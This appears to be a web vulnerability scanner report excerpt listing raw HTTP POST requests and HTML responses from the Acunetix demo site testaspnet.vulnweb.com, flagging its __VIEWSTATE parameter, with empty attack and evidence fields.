Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8401&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAOiCL69oIZGRkDEF3TQOfzFIlteiFcQYPqLF2xks%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKmrKTsBwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUQP1trexIM3NPybCToWOc69KPGbQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:58:51 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAAOiCL69oIZGRkDEF3TQOfzFIlteiFcQYPqLF2xks=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKmrKTsBwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUQP1trexIM3NPybCToWOc69KPGbQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:White" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8400&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBA0PXB6toIZGRkX5dX9lug2nVueFOMHWLUmxJGe8s%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLEr8L2CgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWZFlD5gonyFYpsphztEUMsD48o9A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:21 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBA0PXB6toIZGRkX5dX9lug2nVueFOMHWLUmxJGe8s=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEr8L2CgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWZFlD5gonyFYpsphztEUMsD48o9A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:White" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1099 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
